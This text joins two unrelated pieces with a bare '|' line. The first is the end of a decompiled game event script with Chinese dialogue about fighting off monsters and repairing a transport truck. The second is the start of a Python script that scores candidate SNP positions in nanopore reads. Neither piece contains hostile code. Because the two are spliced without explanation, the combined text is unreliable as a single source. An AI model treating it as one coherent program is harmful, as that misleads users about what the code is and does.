    OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
    ExitThread()
QueueWorkItem(0xC, 1, lambda_136A)
def lambda_1380():
    OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
    ExitThread()
QueueWorkItem(0xD, 1, lambda_1380)
def lambda_1396():
    OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
    ExitThread()
QueueWorkItem(0xE, 1, lambda_1396)
def lambda_13AC():
    OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
    ExitThread()
QueueWorkItem(0xF, 1, lambda_13AC)
SetChrChipByIndex(0x8, 6)
SetChrFlags(0x8, 0x40)
SetChrFlags(0x8, 0x1000)
OP_43(0x8, 0x1, 0x1, 0xE)
WaitChrThread(0x8, 0x1)
# Cancel all running work items before entering battle.
OP_44(0xA, 0xFF)
OP_44(0xB, 0xFF)
OP_44(0xC, 0xFF)
OP_44(0xD, 0xFF)
OP_44(0xE, 0xFF)
OP_44(0xF, 0xFF)
OP_44(0x11, 0xFF)
OP_44(0x12, 0xFF)
OP_44(0x13, 0xFF)
OP_44(0x14, 0xFF)
OP_44(0x8, 0xFF)
OP_44(0x9, 0xFF)
OP_44(0x101, 0xFF)
OP_44(0x102, 0xFF)
OP_44(0x107, 0xFF)
ClearChrFlags(0x8, 0x40)
ClearChrFlags(0x9, 0x40)
ClearChrFlags(0x8, 0x1000)
Battle(0x3F6, 0x0, 0x0, 0x0, 0xFF)
# Battle result switch: value 1 (loss/escape per engine convention —
# TODO confirm) aborts the event; default continues to the aftermath.
Switch(
    (scpexpr(EXPR_PUSH_VALUE_INDEX, 0x3), scpexpr(EXPR_END)),
    (1, "loc_143B"),
    (SWITCH_DEFAULT, "loc_143E"),
)
label("loc_143B")
OP_B4(0x0)
Return()
label("loc_143E")
# Post-battle: hide monsters, reposition everyone, wrap-up dialogue and
# quest completion banner.
EventBegin(0x0)
FadeToBright(1000, 0)
OP_6D(-18050, 20, -37820, 0)
OP_6B(3000, 0)
OP_6C(180000, 0)
SetChrFlags(0xA, 0x80)
SetChrFlags(0xB, 0x80)
SetChrFlags(0xC, 0x80)
SetChrFlags(0xD, 0x80)
SetChrFlags(0xE, 0x80)
SetChrFlags(0xF, 0x80)
SetChrFlags(0x11, 0x80)
SetChrFlags(0x12, 0x80)
SetChrFlags(0x13, 0x80)
SetChrFlags(0x14, 0x80)
SetChrPos(0x8, -17230, 10, -39580, 104)
SetChrPos(0x9, -17250, 20, -36060, 199)
SetChrPos(0x101, -18990, 50, -38440, 225)
SetChrPos(0x102, -20320, 20, -39060, 225)
SetChrPos(0x107, -19090, 50, -36910, 225)
SetChrChipByIndex(0x101, 3)
SetChrChipByIndex(0x102, 9)
SetChrChipByIndex(0x107, 13)
SetChrChipByIndex(0x8, 5)
OP_0D()
Sleep(400)
ChrTalk(
    0x101,
    (
        "#002F大家总算都平安无事了……\x01",
        " \x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x102,
    "#012F嗯,已经把它们击退了。\x02",
)
CloseMessageWindow()
SetChrChipByIndex(0x107, 65535)
TurnDirection(0x107, 0x101, 400)
ChrTalk(
    0x107,
    "#561F呼……太好了~\x02",
)
CloseMessageWindow()
SetChrChipByIndex(0x8, 0)
TurnDirection(0x8, 0x101, 400)
ChrTalk(
    0x8,
    (
        "还好大家都\x01",
        "没受到任何伤害。\x02",
    )
)
CloseMessageWindow()
SetChrChipByIndex(0x101, 65535)
SetChrChipByIndex(0x102, 65535)
def lambda_15BF():
    TurnDirection(0x102, 0x8, 400)
    ExitThread()
QueueWorkItem(0x102, 1, lambda_15BF)
TurnDirection(0x101, 0x8, 400)
ChrTalk(
    0x9,
    "呼~捡回一条命啊。\x02",
)
CloseMessageWindow()
def lambda_1609():
    OP_8C(0x101, 90, 400)
    ExitThread()
QueueWorkItem(0x101, 1, lambda_1609)
def lambda_1617():
    OP_8C(0x107, 135, 400)
    ExitThread()
QueueWorkItem(0x107, 1, lambda_1617)
def lambda_1625():
    OP_6C(270000, 3500)
    ExitThread()
QueueWorkItem(0xA, 1, lambda_1625)
def lambda_1635():
    OP_6D(-18530, 50, -38340, 3500)
    ExitThread()
QueueWorkItem(0xA, 2, lambda_1635)
SetChrFlags(0x9, 0x40)
OP_43(0x102, 0x1, 0x1, 0x11)
OP_8E(0x9, 0xFFFFBB18, 0xA, 0xFFFF718A, 0x3E8, 0x0)
OP_8E(0x9, 0xFFFFBE10, 0xFFFFFFF6, 0xFFFF6A32, 0x3E8, 0x0)
TurnDirection(0x9, 0x102, 400)
ClearChrFlags(0x9, 0x40)
WaitChrThread(0xA, 0x1)
WaitChrThread(0xA, 0x2)
OP_44(0x101, 0xFF)
OP_44(0x107, 0xFF)
ChrTalk(
    0x9,
    (
        "嗯…………\x01",
        "虽然得救了,\x01",
        "但是还要考虑接下来怎么做。\x02",
    )
)
CloseMessageWindow()
TurnDirection(0x9, 0x102, 400)
ChrTalk(
    0x8,
    "嗯,是啊。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x8,
    (
        "首先,无论如何\x01",
        "也要让这个运输车动起来才行。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x101,
    (
        "#003F可是,\x01",
        "刚刚不是已经说过不能修理了吗?\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x107,
    (
        "#063F唔~\x01",
        "我觉得的确很困难。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x102,
    (
        "#012F这么说来……\x01",
        "除了更换零件以外,\x01",
        "的确已经没有其他办法了。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "运输车的管理员是\x01",
        "中央工房的普罗梅笛。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "只要问问他,\x01",
        "应该可以知道更换用的零件的保管场所……\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "可是,要做到这一点,\x01",
        "就必须要回蔡斯一趟。\x02",
    )
)
CloseMessageWindow()
TurnDirection(0x8, 0x9, 400)
ChrTalk(
    0x8,
    (
        "嗯~真头疼啊。\x01",
        "布鲁诺先生,怎么办?\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x8,
    "要回蔡斯去吗?\x02",
)
CloseMessageWindow()
TurnDirection(0x9, 0x8, 400)
ChrTalk(
    0x9,
    (
        "我认为现在还没这必要,\x01",
        "还是再稍微摆弄一下这车子吧。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "能动的话当然是最好了。\x01",
        "如果实在是动不了,\x01",
        "也就只有回蔡斯去了。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x8,
    "这样啊…………\x02",
)
CloseMessageWindow()
ChrTalk(
    0x8,
    (
        "那就暂时\x01",
        "先呆在这里吧。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    "嗯,只有这样了。\x02",
)
CloseMessageWindow()
TurnDirection(0x8, 0x101, 400)
TurnDirection(0x9, 0x101, 400)
ChrTalk(
    0x8,
    (
        "就是这么回事,\x01",
        "我们要留在这里\x01",
        "继续努力试试。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x101,
    (
        "#002F嗯,我知道了……\x01",
        "王先生你们要注意安全哦。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x8,
    "没问题,我不会蛮干的。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x8,
    (
        "一旦有什么危险,\x01",
        "我们会立刻返回城里的。\x02",
    )
)
CloseMessageWindow()
TurnDirection(0x8, 0x107, 400)
ChrTalk(
    0x8,
    (
        "那么,提妲小妹妹,\x01",
        "你们去亚尔摩的路上也要小心。\x02",
    )
)
CloseMessageWindow()
TurnDirection(0x107, 0x8, 400)
ChrTalk(
    0x107,
    "#060F啊,好的。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "如果你们有空的话,\x01",
        "请帮忙联络一下普罗梅笛。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "他应该一直都在中央工房\x01",
        "三楼的设计室里面。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x101,
    "#000F嗯,那再见吧。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x102,
    (
        "#010F王先生你们务必要注意安全。\x01",
        " \x02",
    )
)
CloseMessageWindow()
Sleep(100)
# Quest-complete banner, then set the quest progress flags (OP_28).
OP_22(0x17, 0x0, 0x64)
FadeToDark(300, 0, 100)
SetMessageWindowPos(-1, -1, -1, -1)
SetChrName("")
AnonymousTalk(
    (
        scpstr(SCPSTR_CODE_COLOR, 0x2),
        "任务【寻找运输车】\x07\x00",
        "完成!\x02",
    )
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
SetMessageWindowPos(72, 320, 56, 3)
OP_43(0x8, 0x1, 0x1, 0x12)
OP_43(0x9, 0x1, 0x1, 0x13)
Sleep(100)
OP_28(0x28, 0x4, 0x4)
OP_28(0x28, 0x4, 0x2)
OP_28(0x28, 0x4, 0x10)
OP_28(0x28, 0x1, 0x1)
OP_28(0x28, 0x1, 0x2)
OP_28(0x28, 0x1, 0x4)
OP_28(0x28, 0x1, 0x8)
OP_28(0x28, 0x1, 0x10)
OP_28(0x28, 0x1, 0x20)
OP_28(0x29, 0x4, 0x4)
OP_28(0x29, 0x4, 0x2)
EventEnd(0x0)
ClearChrFlags(0x8, 0x10)
ClearChrFlags(0x9, 0x10)
OP_43(0x9, 0x0, 0x0, 0x2)
OP_43(0x8, 0x0, 0x0, 0x2)
Return()
# Function_2_AC end
# Event: the party returns with the replacement orbal engine; Tita repairs
# the truck, the NPCs drive off, and the repair quest completes.
# NOTE(review): the def below is a decompiler stub; the real body is the
# top-level statement run that follows the label() call.
def Function_3_1CD1(): pass
label("Function_3_1CD1")
EventBegin(0x0)
OP_44(0x9, 0xFF)
OP_44(0x8, 0xFF)
Fade(1000)
OP_6D(-19410, 40, -38900, 0)
SetChrPos(0x101, -18990, 50, -38440, 180)
SetChrPos(0x102, -20320, 20, -39060, 135)
SetChrPos(0x107, -19090, 50, -36910, 180)
OP_6C(300000, 0)
OP_6B(3000, 0)
OP_4A(0x8, 255)
OP_4A(0x9, 255)
OP_0D()
ChrTalk(
    0x101,
    "#000F呼~久等了~\x02",
)
CloseMessageWindow()
ClearChrFlags(0x8, 0x10)
ClearChrFlags(0x9, 0x10)
TurnDirection(0x8, 0x101, 400)
TurnDirection(0x9, 0x101, 400)
ChrTalk(
    0x8,
    "哦,艾丝蒂尔、约修亚。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x8,
    (
        "怎么样?\x01",
        "导力引擎\x01",
        "已经找到了吧?\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x101,
    "#001F嗯,已经找到了。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x102,
    "#010F让你们久等了。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "哦哦,就是这东西,\x01",
        "哎呀,真是帮了大忙了。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "你们走了之后\x01",
        "我又想尽了各种办法……\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "但是不管怎样\x01",
        "还是没法让车子动起来。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x8,
    (
        "我们本来打算离开的。\x01",
        "刚刚正准备商量\x01",
        "回蔡斯的事情。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x101,
    (
        "#000F是这样啊,\x01",
        "我们能够赶上真是太好了。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x102,
    (
        "#010F那么就立刻修理运输车吧。\x01",
        " \x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x107,
    (
        "#060F啊,好的。\x02\x03",
        "#061F交给我来办吧,\x01",
        "啪啪几下就可以更换好导力引擎了呢~\x02",
    )
)
CloseMessageWindow()
TurnDirection(0x8, 0x107, 400)
ChrTalk(
    0x8,
    "啊,拜托了。\x02",
)
CloseMessageWindow()
TurnDirection(0x9, 0x107, 400)
ChrTalk(
    0x9,
    "多谢你帮忙了,小姑娘。\x02",
)
CloseMessageWindow()
# Fade out while everyone walks to the truck; scene re-set for the repair.
def lambda_1FBB():
    OP_8E(0x9, 0xFFFFB4A6, 0xFFFFFFE2, 0xFFFF5E98, 0x3E8, 0x0)
    ExitThread()
QueueWorkItem(0x9, 1, lambda_1FBB)
OP_43(0x8, 0x1, 0x1, 0x14)
SetChrFlags(0x107, 0x40)
OP_8E(0x107, 0xFFFFBAD2, 0x14, 0xFFFF6AC8, 0x5DC, 0x0)
FadeToDark(1000, 0, -1)
OP_8E(0x107, 0xFFFFB596, 0x1E, 0xFFFF606E, 0x5DC, 0x0)
WaitChrThread(0x8, 0x1)
WaitChrThread(0x9, 0x1)
OP_0D()
OP_6D(-18190, 10, -40240, 0)
SetChrPos(0x107, -17490, 10, -39610, 182)
SetChrPos(0x8, -19060, -10, -40450, 145)
SetChrChipByIndex(0x9, 14)
OP_6B(3000, 0)
OP_6C(276000, 0)
SetChrPos(0x10, -17420, -20, -41550, 51)
SetChrFlags(0x10, 0x40)
OP_A1(0x10, 0x0)
OP_72(0x0, 0x4)
OP_72(0x0, 0x2)
OP_71(0x0, 0x400)
OP_71(0x0, 0x40)
Sleep(1)
ClearChrFlags(0x9, 0x4)
SetChrFlags(0x9, 0x40)
SetChrBattleFlags(0x9, 0x20)
OP_89(0x9, -17120, 440, -41360, 51)
SetChrFlags(0x9, 0x20)
LoadEffect(0x0, "map\\\\mp024_00.eff")
TurnDirection(0x101, 0x9, 0)
Sleep(400)
FadeToBright(1000, 0)
OP_0D()
Sleep(400)
ChrTalk(
    0x107,
    "#060F#4P……这样就可以了。\x02",
)
CloseMessageWindow()
OP_94(0x1, 0x107, 0xB4, 0x5DC, 0x7D0, 0x0)
ChrTalk(
    0x9,
    (
        "……那么,\x01",
        "动起来了哦。\x02",
    )
)
CloseMessageWindow()
Sleep(100)
OP_22(0x9D, 0x0, 0x64)
Sleep(400)
OP_22(0xCF, 0x1, 0x55)
ChrTalk(
    0x107,
    (
        "#062F#4P……………………\x02\x03",
        "#060F#4P……嗯,没问题了。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "呼~\x01",
        "这下总算可以把货物运送过去了。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "真不愧是\x01",
        "拉赛尔博士的孙女啊。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "虽然还在上主日学校的年纪,\x01",
        "维修的能力却是顶呱呱哦。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x107,
    "#067F#4P嘿嘿……\x02",
)
CloseMessageWindow()
ChrTalk(
    0x9,
    "好了,我们该出发了。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x9,
    "你们也要注意安全。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x101,
    "#000F#2P嗯,我们会的。\x02",
)
CloseMessageWindow()
TurnDirection(0x8, 0x101, 400)
ChrTalk(
    0x8,
    (
        "那么就再见了,\x01",
        "今天多亏了你们的帮忙。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x102,
    "#010F#2P路上小心。\x02",
)
CloseMessageWindow()
# Party members (0x0-0x2) keep facing the departing truck until their
# work-item threads are cancelled below.
def lambda_2301():
    label("loc_2301")
    TurnDirection(0xFE, 0x9, 400)
    OP_48()
    Jump("loc_2301")
QueueWorkItem2(0x0, 1, lambda_2301)
def lambda_2312():
    label("loc_2312")
    TurnDirection(0xFE, 0x9, 400)
    OP_48()
    Jump("loc_2312")
QueueWorkItem2(0x1, 1, lambda_2312)
def lambda_2323():
    label("loc_2323")
    TurnDirection(0xFE, 0x9, 400)
    OP_48()
    Jump("loc_2323")
QueueWorkItem2(0x2, 1, lambda_2323)
OP_8C(0x8, 51, 400)
SetChrFlags(0x8, 0x40)
OP_71(0x0, 0x20)
OP_6F(0x0, 40)
OP_70(0x0, 0xC8)
def lambda_2353():
    OP_6D(-14070, -40, -37570, 3000)
    ExitThread()
QueueWorkItem(0x10, 3, lambda_2353)
OP_24(0xCF, 0x64)
def lambda_236F():
    OP_94(0x1, 0x10, 0x0, 0x4650, 0x6A4, 0x0)
    ExitThread()
QueueWorkItem(0x10, 1, lambda_236F)
PlayEffect(0x0, 0x0, 0x10, 0, 200, -7000, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
PlayEffect(0x0, 0x1, 0x10, 0, 200, -4000, 0, 0, 0, 1000, 500, 500, 0xFF, 0, 0, 0, 0)
OP_8E(0x8, 0xFFFFBBAE, 0xA, 0xFFFF6546, 0x6A4, 0x0)
OP_8C(0x8, 51, 0)
def lambda_240A():
    OP_94(0x1, 0x8, 0x0, 0x4E20, 0x6A4, 0x0)
    ExitThread()
QueueWorkItem(0x8, 1, lambda_240A)
WaitChrThread(0x10, 0x3)
Sleep(1000)
def lambda_242A():
    OP_69(0x101, 0xBB8)
    ExitThread()
QueueWorkItem(0x10, 3, lambda_242A)
OP_43(0x0, 0x3, 0x1, 0x16)
WaitChrThread(0x10, 0x1)
OP_44(0x8, 0xFF)
OP_44(0x9, 0xFF)
OP_82(0x0, 0x2)
OP_82(0x1, 0x2)
OP_72(0x0, 0x20)
# Reward item and quest-progress flags for the repair quest.
OP_3F(0x346, 1)
OP_28(0x29, 0x1, 0x40)
OP_28(0x29, 0x4, 0x10)
SetChrFlags(0x8, 0x80)
SetChrFlags(0x9, 0x80)
SetChrFlags(0x10, 0x80)
OP_71(0x0, 0x4)
WaitChrThread(0x10, 0x3)
WaitChrThread(0x0, 0x3)
OP_44(0x0, 0xFF)
OP_44(0x1, 0xFF)
OP_44(0x2, 0xFF)
OP_22(0x17, 0x0, 0x64)
FadeToDark(300, 0, 100)
SetMessageWindowPos(-1, -1, -1, -1)
SetChrName("")
AnonymousTalk(
    (
        scpstr(SCPSTR_CODE_COLOR, 0x2),
        "任务【修理运输车】\x07\x00",
        "完成!\x02",
    )
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
SetMessageWindowPos(72, 320, 56, 3)
EventEnd(0x0)
Return()
# Function_3_1CD1 end
# Monster work item: shake in place, then switch to sprite chip 7.
def Function_4_24EF(): pass
label("Function_4_24EF")
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_4_24EF end
# Monster work item: same shake-then-rechip behavior as Function_4.
def Function_5_2504(): pass
label("Function_5_2504")
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_5_2504 end
# Monster work item: shake, hop to a new spot (OP_96), shake again,
# then switch to sprite chip 7.
def Function_6_2519(): pass
label("Function_6_2519")
OP_94(0x1, 0xFE, 0x0, 0x5DC, 0x7D0, 0x0)
OP_4A(0xFE, 0)
SetChrSubChip(0xFE, 4)
OP_96(0xFE, 0xFFFF9F3E, 0x3C, 0xFFFF5D80, 0x320, 0x3E8)
OP_4B(0xFE, 0)
OP_94(0x1, 0xFE, 0x0, 0xC8, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_6_2519 end
# Monster work item: same shake-then-rechip behavior as Function_4.
def Function_7_2561(): pass
label("Function_7_2561")
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_7_2561 end
# Monster work item: same shake-then-rechip behavior as Function_4.
def Function_8_2576(): pass
label("Function_8_2576")
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_8_2576 end
# Monster work item: same shake-then-rechip behavior as Function_4.
def Function_9_258B(): pass
label("Function_9_258B")
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0x7D0, 0x0)
SetChrChipByIndex(0xFE, 7)
Return()
# Function_9_258B end
# Monster approach: walk in (OP_8E) while a secondary thread keeps the
# monster facing character 0x9, glide to the attack spot, then rechip.
def Function_10_25A0(): pass
label("Function_10_25A0")
SetChrFlags(0xFE, 0x40)
OP_8E(0xFE, 0xFFFFC16C, 0xA, 0xFFFF531C, 0x1388, 0x0)
def lambda_25BF():
    label("loc_25BF")
    TurnDirection(0xFE, 0x9, 0)
    OP_48()
    Jump("loc_25BF")
QueueWorkItem2(0xFE, 2, lambda_25BF)
OP_8F(0xFE, 0xFFFFCA04, 0xFFFFFFD8, 0xFFFF6816, 0x1388, 0x0)
SetChrChipByIndex(0xFE, 7)
OP_44(0xFE, 0x2)
Return()
# Function_10_25A0 end
# Monster approach: same pattern as Function_10, different destination.
def Function_11_25E8(): pass
label("Function_11_25E8")
SetChrFlags(0xFE, 0x40)
OP_8E(0xFE, 0xFFFFC16C, 0xA, 0xFFFF531C, 0x1388, 0x0)
def lambda_2607():
    label("loc_2607")
    TurnDirection(0xFE, 0x9, 0)
    OP_48()
    Jump("loc_2607")
QueueWorkItem2(0xFE, 2, lambda_2607)
OP_8F(0xFE, 0xFFFFC932, 0xFFFFFFA6, 0xFFFF5F2E, 0x1388, 0x0)
SetChrChipByIndex(0xFE, 7)
OP_44(0xFE, 0x2)
Return()
# Function_11_25E8 end
# Monster approach: same pattern as Function_10, different destination.
def Function_12_2630(): pass
label("Function_12_2630")
SetChrFlags(0xFE, 0x40)
OP_8E(0xFE, 0xFFFFC16C, 0xA, 0xFFFF531C, 0x1388, 0x0)
def lambda_264F():
    label("loc_264F")
    TurnDirection(0xFE, 0x9, 0)
    OP_48()
    Jump("loc_264F")
QueueWorkItem2(0xFE, 2, lambda_264F)
OP_8F(0xFE, 0xFFFFC360, 0xFFFFFFC4, 0xFFFF5A2E, 0x1388, 0x0)
SetChrChipByIndex(0xFE, 7)
OP_44(0xFE, 0x2)
Return()
# Function_12_2630 end
# Character 0x8's attack animation: face, play animation frames (OP_99)
# with sound 0x1F5, while 0x9 recoils (OP_95).
def Function_13_2678(): pass
label("Function_13_2678")
OP_8C(0x8, 225, 0)
OP_44(0x8, 0x0)
SetChrChipByIndex(0x8, 11)
OP_22(0x1F5, 0x0, 0x64)
OP_99(0x8, 0x0, 0x3, 0xBB8)
Sleep(200)
OP_99(0x8, 0x4, 0x7, 0xBB8)
OP_95(0x9, 0x0, 0x0, 0x0, 0x320, 0x2EE0)
Return()
# Function_13_2678 end
# Movement work item: walk in, then glide while facing character 0x12.
def Function_14_26BC(): pass
label("Function_14_26BC")
OP_8E(0xFE, 0xFFFFBAD2, 0x1E, 0xFFFF65D2, 0x1388, 0x0)
def lambda_26D6():
    label("loc_26D6")
    TurnDirection(0xFE, 0x12, 0)
    OP_48()
    Jump("loc_26D6")
QueueWorkItem2(0xFE, 2, lambda_26D6)
OP_8F(0xFE, 0xFFFFC02C, 0xFFFFFFEC, 0xFFFF67DA, 0x1388, 0x0)
OP_44(0xFE, 0x2)
Return()
# Function_14_26BC end
# Spin loop: rotate the character a full turn in 45-degree steps forever.
# The Jc condition is the constant 1, so the loop only ends when the
# owning thread is cancelled externally.
def Function_15_26FA(): pass
label("Function_15_26FA")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_273E")
OP_8C(0xFE, 45, 1000)
OP_8C(0xFE, 90, 1000)
OP_8C(0xFE, 135, 1000)
OP_8C(0xFE, 180, 1000)
OP_8C(0xFE, 225, 1000)
OP_8C(0xFE, 270, 1000)
OP_8C(0xFE, 315, 1000)
OP_8C(0xFE, 360, 1000)
Jump("Function_15_26FA")
label("loc_273E")
Return()
# Function_15_26FA end
# Knockback for monster 0x14: glide away, impact effect + sound, fade out
# (OP_9F on a worker thread) while hopping backwards twice.
def Function_16_273F(): pass
label("Function_16_273F")
OP_8F(0x14, 0xFFFFA358, 0xC8, 0xFFFF5088, 0x1F40, 0x0)
PlayEffect(0x12, 0xFF, 0xFF, -23720, 30, -44920, 0, 0, 0, 2000, 2000, 2000, 0xFF, 0, 0, 0, 0)
OP_22(0x20B, 0x0, 0x5F)
def lambda_2793():
    OP_9F(0x14, 0xFF, 0xFF, 0xFF, 0x0, 0x190)
    ExitThread()
QueueWorkItem(0x14, 1, lambda_2793)
OP_96(0x14, 0xFFFF9EA8, 0xC8, 0xFFFF5092, 0x1F4, 0xFA0)
OP_96(0x14, 0xFFFF9AAC, 0xC8, 0xFFFF4D0E, 0x1F4, 0x7D0)
Return()
# Function_16_273F end
# Walk character 0x102 to a position and face character 0x8.
def Function_17_27CE(): pass
label("Function_17_27CE")
OP_8E(0x102, 0xFFFFB2B2, 0x14, 0xFFFF65FA, 0x3E8, 0x0)
TurnDirection(0xFE, 0x8, 400)
Return()
# Function_17_27CE end
# Walk character 0x8 to a position and face heading 145.
def Function_18_27EA(): pass
label("Function_18_27EA")
SetChrFlags(0xFE, 0x40)
OP_8E(0x8, 0xFFFFB58C, 0xFFFFFFF6, 0xFFFF61FE, 0x7D0, 0x0)
OP_8C(0x8, 145, 400)
ClearChrFlags(0xFE, 0x40)
Return()
# Function_18_27EA end
# Walk character 0x9 to a position and face heading 182.
def Function_19_2810(): pass
label("Function_19_2810")
SetChrFlags(0xFE, 0x40)
OP_8E(0x9, 0xFFFFBBAE, 0xA, 0xFFFF6546, 0x7D0, 0x0)
OP_8C(0x9, 182, 400)
ClearChrFlags(0xFE, 0x40)
Return()
# Function_19_2810 end
# Walk character 0x8 to a position and face heading 135.
def Function_20_2836(): pass
label("Function_20_2836")
OP_8E(0x8, 0xFFFFAE34, 0xFFFFFFCE, 0xFFFF6334, 0xBB8, 0x0)
OP_8C(0x8, 135, 400)
Return()
# Function_20_2836 end
# Wobble animation: four alternating small shakes (OP_94) on the caller.
def Function_21_2852(): pass
label("Function_21_2852")
OP_94(0x1, 0xFE, 0x5A, 0x64, 0xBB8, 0x0)
OP_94(0x1, 0xFE, 0x10E, 0x64, 0xBB8, 0x0)
OP_94(0x1, 0xFE, 0x5A, 0x64, 0xBB8, 0x0)
OP_94(0x1, 0xFE, 0x10E, 0x64, 0xBB8, 0x0)
Return()
# Function_21_2852 end
# Audio fade-out: after 4s, step the volume of looping sound 0xCF down
# (0x5F -> 0x37) every 100ms, then stop it (OP_23).
def Function_22_288F(): pass
label("Function_22_288F")
Sleep(4000)
OP_24(0xCF, 0x5F)
Sleep(100)
OP_24(0xCF, 0x5A)
Sleep(100)
OP_24(0xCF, 0x55)
Sleep(100)
OP_24(0xCF, 0x50)
Sleep(100)
OP_24(0xCF, 0x4B)
Sleep(100)
OP_24(0xCF, 0x46)
Sleep(100)
OP_24(0xCF, 0x41)
Sleep(100)
OP_24(0xCF, 0x3C)
Sleep(100)
OP_24(0xCF, 0x37)
Sleep(100)
OP_23(0xCF)
Return()
# Function_22_288F end
# Module epilogue: write the assembled scenario back out, then run main()
# under the helper's Try wrapper.
SaveToFile()
Try(main)
|
import h5py
import numpy as np
import sys
import matplotlib
import matplotlib.pyplot as plt
import argparse
from genome import *
from read import *
from bc_read import *
from alphabet import *
from kmer_model import *
from base import *
from model import *
import yaml
import os
# Command-line interface: score "interesting" reference positions (candidate
# SNPs) from re-squiggled nanopore reads in a fast5 directory.
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--output", help="output file for a posteriori probabilities")
parser.add_argument("-l", "--log_output", help="file for detailed output (including conditional probabilities and base indices)")
parser.add_argument("-p", "--print_worst", help="print worst n candidates")
parser.add_argument("-s", "--show_worst", help="number of worst positions to show (only works with --print_best)")
parser.add_argument("-i", "--independent", help="treat each read independently", action='store_true')
parser.add_argument("-k", "--kmer_model", help="file with kmer model to use", default="tombo")
parser.add_argument("-g", "--group_name", help="name of group in fast5 files containing basecall info", default="Analyses/Basecall_1D_000")
parser.add_argument("-b", "--basecall_only", help="only use basecalled sequence to determine SNPs (ignore signal)", action='store_true')
parser.add_argument("-c", "--configuration", help="config file with reresquiggle parameters", default="default.yaml")
parser.add_argument("-f", "--full_interval", help="compute scores for whole reference instead of just interesting bases", action="store_true")
parser.add_argument("-a", "--around_changes", help="compute scores for all bases between first and last changed base", action="store_true")
parser.add_argument("reference", help="reference fasta file")
parser.add_argument("interesting", help="list of interesting positions in reference")
parser.add_argument("read_basedir", help="base directory of resquiggled fast5 files")
args = parser.parse_args()
# Reject option combinations that make no sense -- fail fast.
if args.independent and args.print_worst:
    print("--print_worst doesn't work with --independent")
    exit(1)
if args.show_worst and not args.print_worst:
    print("--show_worst only works with --print_worst")
    exit(1)
# Select the k-mer current-level model by name.
kmer_model = None
if args.kmer_model == "tombo":
    kmer_model = tombo_kmer_model("data/tombo.DNA.model")
elif args.kmer_model == "picoamp":
    kmer_model = picoamp_kmer_model("data/6mer_model.txt")
elif args.kmer_model == "klebs":
    kmer_model = tombo_kmer_model("data/klebs2of6.DNA.model")
else:
    raise ValueError("Unknown kmer model: {}".format(args.kmer_model))
# Load re-squiggle parameters.
# NOTE(review): yaml.load without an explicit Loader is deprecated (and
# unsafe on untrusted files) in newer PyYAML -- confirm the PyYAML version
# before switching to safe_load.
with open(args.configuration, "r") as f:
    config = yaml.load(f)
# Pick the scoring model and a matching read loader with a uniform signature.
load_read = None
if args.basecall_only:
    model = basecall_model(args.reference, config)
    load_read = lambda read_file, kmer_model, group_name : basecalled_read(filename=read_file, kmer_model = kmer_model, basecall_group=group_name)
else:
    model = window_model(kmer_model, config = config)
    load_read = lambda read_file, kmer_model, group_name : resquiggled_read(filename=read_file, kmer_model = kmer_model)
# Reference sequence and the list of positions to score.
reference = load_fasta(args.reference)[0].bases
interesting = load_interesting_bases(args.interesting, reference)
